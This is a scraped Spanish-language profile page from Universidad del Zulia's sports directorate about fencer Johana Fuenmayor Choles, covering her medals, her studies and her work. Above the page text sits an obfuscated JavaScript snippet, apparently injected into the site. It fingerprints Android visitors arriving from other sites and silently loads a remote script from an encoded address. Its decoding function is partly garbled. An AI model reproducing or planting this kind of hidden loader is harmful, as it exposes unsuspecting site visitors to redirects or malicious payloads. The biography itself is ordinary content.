;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Johana Fuenmayor Choles - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Johana Fuenmayor Choles PDF Imprimir Correo

Premio Luis Aparicio
Buen Estudiante Deportista de LUZ
1997-1998


Fue la primera atleta zuliana en ofrendar a nuestro estado  medalla de oro en la disciplina del esgrima en los Juegos Nacionales Juveniles de 1996. Licenciada en Bioanálisis egresada de nuestra máxima casa de estudios; se inició en esta disciplina a la edad de diez años de la mano de su entrenador Ulises Solano.

Dentro de los más importantes galardones que esta excelente floretista, miembro de la selección nacional e integrante del equipo  de esgrima de la Universidad del Zulia, alcanzó al momento de ser exaltada a la galería del buen Estudiante-Deportista de LUZ;  destacan medalla de oro en los Juvines 98 en individual y por equipos; asimismo alcanzó la presea de plata en los Juegos Centroamericanos y del Caribe 98;  y diadema de bronce en los Juegos Panamericanos de Winnipeg, Canadá.

De igual forma, el recorrido realizado con su espada  por diferentes escenarios deportivos internacionales la ubicaron en el segundo lugar del ranking nacional y la número 16 a nivel mundial.

Luego de recibir su título universitario en el año 2001; emprendió un viaje hacia Francia para realizar estudios de postgrado en la Universidad de La Sorbona; gracias a una beca recibida por el Instituto Regional de Deportes del Estado Zulia.

Durante su estadía en Francia cursó estudios de idiomas, lamentablemente tuvo que regresar,  debido a la situación económica y política que en ese momento estaba atravesando nuestro país. Actualmente continúa sus estudios de inglés.

En lo que respecta a su desempeño deportivo, cumplió todo su ciclo olímpico logrando los títulos en los Juegos Bolivarianos celebrados en Quito, 2001; en los Suramericanos 2002; Centroamericanos y del Caribe 2002 y sexto lugar en los Panamericanos del 2003. Actualmente integra las filas de la Selección Nacional de Esgrima.

Su ejercicio profesional lo realiza en el Departamento de Medicina Deportiva del Instituto Regional de Deportes del Estado Zulia y en un laboratorio de una reconocida clínica de la ciudad.


                                                                                                                            Redacción: Yasmira Meleán Marin
                                                                                                                            Fotografía: Claudio Ocando
                                                                                                                            Febrero de 2004




^ Subir